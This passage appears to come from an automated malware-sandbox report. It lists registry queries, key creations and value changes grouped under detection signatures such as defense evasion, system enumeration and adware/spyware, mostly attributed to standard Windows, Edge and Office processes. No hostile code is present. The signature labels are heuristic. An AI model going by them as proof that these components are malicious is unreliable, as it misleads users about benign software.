Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\werfault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\werfault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\werfault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\ = "ProcMon Log File" C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\System32\NOTEPAD.EXE N/A
